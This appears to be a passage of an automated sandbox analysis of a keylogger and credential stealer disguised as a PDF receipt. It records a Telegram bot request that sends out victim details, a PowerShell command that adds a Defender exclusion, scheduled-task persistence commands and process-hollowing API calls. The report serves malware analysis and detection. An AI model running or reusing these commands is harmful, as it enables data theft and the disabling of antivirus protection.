                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be55698e68ca1-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1929&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1428571&cwnd=168&unsent_bytes=0&cid=94d5991865ad046c&ts=157&x=0"
                                                                                                                                                        2025-01-16 06:02:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.449775149.154.167.2204438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:18 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:19 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:18 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 55
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                        2025-01-16 06:02:19 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:01:01:58
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                                                                                                                                                        Imagebase:0xd30000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"
                                                                                                                                                        Imagebase:0x4e0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"
                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:01:02:01
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:01:02:02
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        Imagebase:0x7ff693ab0000
                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:01:02:03
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        Imagebase:0xde0000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 26%, ReversingLabs
                                                                                                                                                        • Detection: 28%, Virustotal, Browse
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:01:02:04
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"
                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:01:02:04
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:01:02:04
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\teXfNv.exe"
                                                                                                                                                        Imagebase:0x640000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:3.1%
                                                                                                                                                          Total number of Nodes:196
                                                                                                                                                          Total number of Limit Nodes:8
                                                                                                                                                          execution_graph 44494 a0f1e5c 44495 a0f1bf4 44494->44495 44499 a0f1c28 44495->44499 44500 a0f42fe 44495->44500 44518 a0f42a0 44495->44518 44535 a0f4290 44495->44535 44501 a0f428c 44500->44501 44502 a0f4301 44500->44502 44552 a0f45c0 44501->44552 44558 a0f4e02 44501->44558 44563 a0f4a23 44501->44563 44568 a0f49a3 44501->44568 44573 a0f4984 44501->44573 44578 a0f4966 44501->44578 44583 a0f468c 44501->44583 44588 a0f480e 44501->44588 44593 a0f4a8f 44501->44593 44598 a0f4952 44501->44598 44603 a0f5178 44501->44603 44607 a0f4afa 44501->44607 44611 a0f497c 44501->44611 44616 a0f4bbe 44501->44616 44502->44499 44503 a0f42de 44503->44499 44519 a0f42ba 44518->44519 44521 a0f4a8f 2 API calls 44519->44521 44522 a0f480e 2 API calls 44519->44522 44523 a0f468c 2 API calls 44519->44523 44524 a0f4966 2 API calls 44519->44524 44525 a0f4984 2 API calls 44519->44525 44526 a0f49a3 2 API calls 44519->44526 44527 a0f4a23 2 API calls 44519->44527 44528 a0f4e02 2 API calls 44519->44528 44529 a0f45c0 2 API calls 44519->44529 44530 a0f4bbe 2 API calls 44519->44530 44531 a0f497c 2 API calls 44519->44531 44532 a0f4afa 2 API calls 44519->44532 44533 a0f5178 2 API calls 44519->44533 44534 a0f4952 2 API calls 44519->44534 44520 a0f42de 44520->44499 44521->44520 44522->44520 44523->44520 44524->44520 44525->44520 44526->44520 44527->44520 44528->44520 44529->44520 44530->44520 44531->44520 44532->44520 44533->44520 44534->44520 44536 a0f429d 44535->44536 44538 a0f4a8f 2 API calls 44536->44538 44539 a0f480e 2 API calls 44536->44539 44540 a0f468c 2 API calls 44536->44540 44541 a0f4966 2 API calls 44536->44541 44542 a0f4984 2 API calls 44536->44542 44543 a0f49a3 2 API calls 44536->44543 44544 a0f4a23 2 API calls 44536->44544 44545 a0f4e02 2 API calls 44536->44545 44546 a0f45c0 2 API calls 44536->44546 44547 a0f4bbe 2 API calls 44536->44547 44548 a0f497c 2 API calls 44536->44548 44549 a0f4afa 2 API calls 44536->44549 44550 a0f5178 2 API calls 44536->44550 44551 a0f4952 2 API calls 44536->44551 44537 a0f42de 44537->44499 44538->44537 44539->44537 44540->44537 44541->44537 44542->44537 44543->44537 44544->44537 44545->44537 44546->44537 44547->44537 44548->44537 44549->44537 44550->44537 44551->44537 44553 a0f4603 44552->44553 44554 a0f5231 44553->44554 44621 a0f17cc 44553->44621 44625 a0f17d8 44553->44625 44554->44503 44559 a0f4e0b 44558->44559 44629 a0f154b 44559->44629 44633 a0f1550 44559->44633 44560 a0f4f29 44560->44503 44564 a0f5172 44563->44564 44637 a0f5438 44564->44637 44642 a0f5448 44564->44642 44565 a0f518b 44569 a0f49a9 44568->44569 44570 a0f48b9 44569->44570 44655 a0f1639 44569->44655 44659 a0f1640 44569->44659 44570->44503 44574 a0f4991 44573->44574 44576 a0f154b WriteProcessMemory 44574->44576 44577 a0f1550 WriteProcessMemory 44574->44577 44575 a0f4ace 44575->44503 44576->44575 44577->44575 44579 a0f4973 44578->44579 44663 a0f5321 44579->44663 44668 a0f5330 44579->44668 44580 a0f4c9d 44580->44503 44584 a0f4698 44583->44584 44586 a0f17cc CreateProcessA 44584->44586 44587 a0f17d8 CreateProcessA 44584->44587 44585 a0f47ef 44585->44503 44586->44585 44587->44585 44589 a0f4822 44588->44589 44591 a0f0f79 Wow64SetThreadContext 44589->44591 44592 a0f0f80 Wow64SetThreadContext 44589->44592 44590 a0f4ccd 44591->44590 44592->44590 44594 a0f4a95 44593->44594 44596 a0f154b WriteProcessMemory 44594->44596 44597 a0f1550 WriteProcessMemory 44594->44597 44595 a0f4ace 44595->44503 44596->44595 44597->44595 44599 a0f495f 44598->44599 44681 a0f0ec9 44599->44681 44685 a0f0ed0 44599->44685 44600 a0f4fa3 44604 a0f518b 44603->44604 44605 a0f5438 2 API calls 44603->44605 44606 a0f5448 2 API calls 44603->44606 44605->44604 44606->44604 44609 a0f154b WriteProcessMemory 44607->44609 44610 a0f1550 WriteProcessMemory 44607->44610 44608 a0f4b28 44609->44608 44610->44608 44612 a0f49aa 44611->44612 44614 a0f1639 ReadProcessMemory 44612->44614 44615 a0f1640 ReadProcessMemory 44612->44615 44613 a0f48b9 44613->44503 44614->44613 44615->44613 44617 a0f4bc4 44616->44617 44619 a0f0ec9 ResumeThread 44617->44619 44620 a0f0ed0 ResumeThread 44617->44620 44618 a0f4fa3 44619->44618 44620->44618 44622 a0f17d2 CreateProcessA 44621->44622 44624 a0f1a23 44622->44624 44626 a0f1809 CreateProcessA 44625->44626 44628 a0f1a23 44626->44628 44630 a0f1598 WriteProcessMemory 44629->44630 44632 a0f15ef 44630->44632 44632->44560 44634 a0f1598 WriteProcessMemory 44633->44634 44636 a0f15ef 44634->44636 44636->44560 44638 a0f545d 44637->44638 44647 a0f0f79 44638->44647 44651 a0f0f80 44638->44651 44639 a0f5473 44639->44565 44643 a0f545d 44642->44643 44645 a0f0f79 Wow64SetThreadContext 44643->44645 44646 a0f0f80 Wow64SetThreadContext 44643->44646 44644 a0f5473 44644->44565 44645->44644 44646->44644 44648 a0f0fc5 Wow64SetThreadContext 44647->44648 44650 a0f100d 44648->44650 44650->44639 44652 a0f0fc5 Wow64SetThreadContext 44651->44652 44654 a0f100d 44652->44654 44654->44639 44656 a0f168b ReadProcessMemory 44655->44656 44658 a0f16cf 44656->44658 44658->44570 44660 a0f168b ReadProcessMemory 44659->44660 44662 a0f16cf 44660->44662 44662->44570 44664 a0f5345 44663->44664 44673 a0f1488 44664->44673 44677 a0f1490 44664->44677 44665 a0f5364 44665->44580 44669 a0f5345 44668->44669 44671 a0f1488 VirtualAllocEx 44669->44671 44672 a0f1490 VirtualAllocEx 44669->44672 44670 a0f5364 44670->44580 44671->44670 44672->44670 44674 a0f14d0 VirtualAllocEx 44673->44674 44676 a0f150d 44674->44676 44676->44665 44678 a0f14d0 VirtualAllocEx 44677->44678 44680 a0f150d 44678->44680 44680->44665 44682 a0f0f10 ResumeThread 44681->44682 44684 a0f0f41 44682->44684 44684->44600 44686 a0f0f10 ResumeThread 44685->44686 44688 a0f0f41 44686->44688 44688->44600 44689 8158cc0 44690 8158cfa 44689->44690 44691 8158d76 44690->44691 44692 8158d8b 44690->44692 44697 8156964 44691->44697 44693 8156964 3 API calls 44692->44693 44696 8158d9a 44693->44696 44699 815696f 44697->44699 44698 8158d81 44699->44698 44702 81596d0 44699->44702 44709 81596e0 44699->44709 44703 81596e0 44702->44703 44715 81569ac 44703->44715 44706 8159707 44706->44698 44707 815971f CreateIconFromResourceEx 44708 81597ae 44707->44708 44708->44698 44710 81569ac CreateIconFromResourceEx 44709->44710 44711 81596fa 44710->44711 44712 8159707 44711->44712 44713 815971f CreateIconFromResourceEx 44711->44713 44712->44698 44714 81597ae 44713->44714 44714->44698 44716 8159730 CreateIconFromResourceEx 44715->44716 44717 81596fa 44716->44717 44717->44706 44717->44707 44718 1659ab0 44719 1659ac7 44718->44719 44720 1659ad8 44719->44720 44722 1659c38 44719->44722 44723 1659c5d 44722->44723 44727 1659d48 44723->44727 44731 1659d38 44723->44731 44729 1659d6f 44727->44729 44728 1659e4c 44728->44728 44729->44728 44735 16598c0 44729->44735 44733 1659d6f 44731->44733 44732 1659e4c 44732->44732 44733->44732 44734 16598c0 CreateActCtxA 44733->44734 44734->44732 44736 165add8 CreateActCtxA 44735->44736 44738 165ae9b 44736->44738 44743 a0f5578 44744 a0f5703 44743->44744 44745 a0f559e 44743->44745 44745->44744 44747 a0f0904 44745->44747 44748 a0f57f8 PostMessageW 44747->44748 44749 a0f5864 44748->44749 44749->44745 44739 8157b78 44740 8157bc6 DrawTextExW 44739->44740 44742 8157c1e 44740->44742

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 08156964 Relevance: 6.9, Strings: 5, Instructions: 624COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 297 8156964-8158de0 300 8158de6-8158deb 297->300 301 81592c3-815932c 297->301 300->301 302 8158df1-8158e0e 300->302 309 8159333-81593bb 301->309 308 8158e14-8158e18 302->308 302->309 310 8158e27-8158e2b 308->310 311 8158e1a-8158e24 call 8156974 308->311 354 81593c6-8159446 309->354 314 8158e2d-8158e37 call 8156974 310->314 315 8158e3a-8158e41 310->315 311->310 314->315 319 8158e47-8158e77 315->319 320 8158f5c-8158f61 315->320 329 8159646-815966c 319->329 334 8158e7d-8158f50 call 8156980 * 2 319->334 324 8158f63-8158f67 320->324 325 8158f69-8158f6e 320->325 324->325 326 8158f70-8158f74 324->326 327 8158f80-8158fb0 call 815698c * 3 325->327 326->329 330 8158f7a-8158f7d 326->330 327->354 355 8158fb6-8158fb9 327->355 341 815967c 329->341 342 815966e-815967a 329->342 330->327 334->320 361 8158f52 334->361 345 815967f-8159684 341->345 342->345 369 815944d-81594cf 354->369 355->354 356 8158fbf-8158fc1 355->356 356->354 357 8158fc7-8158ffc 356->357 368 8159002-815900b 357->368 357->369 361->320 370 8159011-815906b call 815698c * 2 call 815699c * 2 368->370 371 815916e-8159172 368->371 375 81594d7-8159559 369->375 418 815907d 370->418 419 815906d-8159076 370->419 371->375 376 8159178-815917c 371->376 378 8159561-815958e 375->378 376->378 379 8159182-8159188 376->379 394 8159595-8159615 378->394 384 815918c-81591c1 379->384 385 815918a 379->385 387 81591c8-81591ce 384->387 385->387 387->394 395 81591d4-81591dc 387->395 452 815961c-815963e 394->452 398 81591e3-81591e5 395->398 399 81591de-81591e2 395->399 401 8159247-815924d 398->401 402 81591e7-815920b 398->402 399->398 410 815926c-815929a 401->410 411 815924f-815926a 401->411 436 8159214-8159218 402->436 437 815920d-8159212 402->437 432 81592a2-81592ae 410->432 411->432 420 8159081-8159083 418->420 419->420 421 8159078-815907b 419->421 426 8159085 420->426 427 815908a-815908e 420->427 421->420 426->427 434 8159090-8159097 427->434 435 815909c-81590a2 427->435 451 81592b4-81592c0 432->451 432->452 443 8159139-815913d 434->443 438 81590a4-81590aa 435->438 439 81590ac-81590b1 435->439 436->329 442 815921e-8159221 436->442 444 8159224-8159235 437->444 447 81590b7-81590bd 438->447 439->447 442->444 449 815915c-8159168 443->449 450 815913f-8159159 443->450 486 8159237 call 81596d0 444->486 487 8159237 call 81596e0 444->487 455 81590c3-81590c8 447->455 456 81590bf-81590c1 447->456 449->370 449->371 450->449 452->329 461 81590ca-81590dc 455->461 456->461 458 815923d-8159245 458->432 467 81590e6-81590eb 461->467 468 81590de-81590e4 461->468 469 81590f1-81590f8 467->469 468->469 474 81590fe 469->474 475 81590fa-81590fc 469->475 476 8159103-815910e 474->476 475->476 478 8159110-8159113 476->478 479 8159132 476->479 478->443 481 8159115-815911b 478->481 479->443 482 8159122-815912b 481->482 483 815911d-8159120 481->483 482->443 485 815912d-8159130 482->485 483->479 483->482 485->443 485->479 486->458 487->458
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                                                          • API String ID: 0-1079488684
                                                                                                                                                          • Opcode ID: f46438bd3a112d0bb9c24d5431dda4c5d9e6bf8e863084bb45d38d36364bb9b0
                                                                                                                                                          • Instruction ID: 3c2a012ddbd2ad0a4bb51f2d40f397522d918802dcdcf9a2879cbc0ec0d28182
                                                                                                                                                          • Opcode Fuzzy Hash: f46438bd3a112d0bb9c24d5431dda4c5d9e6bf8e863084bb45d38d36364bb9b0
                                                                                                                                                          • Instruction Fuzzy Hash: 9D329D70A00258CFDB54DFA8D8907AEBBF6BF84300F1485AAD419AB395DB359D81CF91
                                                                                                                                                          Function 01651458 Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 488 1651458-165147b 489 1651482-16514dc call 16500e4 488->489 490 165147d 488->490 494 16514df 489->494 490->489 495 16514e6-1651502 494->495 496 1651504 495->496 497 165150b-165150c 495->497 496->494 498 1651584-1651591 496->498 499 16515b7-16515ed call 1651bd0 496->499 500 1651511-165154a 496->500 501 165156d-165157f 496->501 502 165154c-1651568 496->502 503 165162f-1651633 496->503 504 165165f-16516cf call 16500f4 496->504 505 165160a-165162a 496->505 497->500 497->504 514 165159a-16515b2 498->514 519 16515f3-1651605 499->519 500->495 501->495 502->495 506 1651635-1651644 503->506 507 1651646-165164d 503->507 522 16516d1 call 1652da5 504->522 523 16516d1 call 1652568 504->523 524 16516d1 call 1652a3b 504->524 505->495 510 1651654-165165a 506->510 507->510 510->495 514->495 519->495 521 16516d7-16516e1 522->521 523->521 524->521
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -7v$-7v$RBtd$Tekq$Tekq
                                                                                                                                                          • API String ID: 0-406973083
